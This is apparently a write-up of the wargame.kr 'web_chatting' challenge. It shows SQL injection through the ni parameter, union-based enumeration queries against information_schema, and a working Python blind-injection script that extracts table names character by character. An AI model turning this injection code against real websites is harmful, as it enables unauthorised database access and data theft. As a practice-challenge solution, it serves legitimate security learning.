After logging in, the chat page comes up.



Looking at the source,

the page keeps checking the ni value, and whenever tni and ni differ it fetches chatview.php.

Opening http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=1 directly

shows the chat history.

SQL injection is possible through the ni parameter.

At first I assumed it was a blind SQL injection and spent ages brute-forcing it (that does work),

but while running that I tried a union and it went through..

The union result shows up at the very bottom of the page.


Match the column count (5), then the usual three steps for the union tail:

select table_name,1,2,3,4 from information_schema.tables;

select column_name,1,2,3,4 from information_schema.columns

select (column) from (table)


The part I fumbled around with

*** blind injection code


import http.client
import string
from urllib import parse


def blind(q):
    con = http.client.HTTPConnection('wargame.kr:8080')
    # Cookies are separated by '; ' (the original used '&', which sends a single
    # cookie named chat_id with the value 'admin&ci_session='). Session value left blank.
    head = {'Cookie': 'chat_id=admin; ci_session='}
    q = parse.quote(q)
    # True branch -> ni=1 and the ni=1 chat comes back; false branch -> ni=@
    # (an unset MySQL user variable, i.e. NULL), which matches no row.
    con.request('GET', '/web_chatting/chatview.php?t=1&ni=if(' + q + ',1,@)', headers=head)
    res = con.getresponse().read()
    # print(res)
    return b'111111111111111' in res


print(blind('1=1'))

# 1. length of every table name (information_schema.tables, row at offset i)
table_length = []
i = 0   # the original started at 1, which skipped the first table and misaligned the lists below
while True:
    if not blind('(select length(table_name) from information_schema.tables limit {},1)>0'.format(i)):
        break
    for j in range(1, 65):   # the original capped lengths at 10, too short for many table names
        if blind('(select length(table_name) from information_schema.tables limit {},1)={}'.format(i, j)):
            table_length.append(j)
            print(j)
            break
    i += 1
print(table_length)

# 2. recover each name one character at a time (substring() is 1-based)
table_name = []
charset = '0123456789' + string.ascii_letters + '_'   # '_' added: information_schema names contain it
for i in range(len(table_length)):
    name = ''   # the original reused `arr` here, which wiped the character set on the first pass
    for j in range(1, table_length[i] + 1):
        for a in charset:
            if blind('(select ascii(substring(table_name,{},1)) from information_schema.tables limit {},1)={}'.format(j, i, ord(a))):
                name += a
                break
    table_name.append(name)
print(table_name)

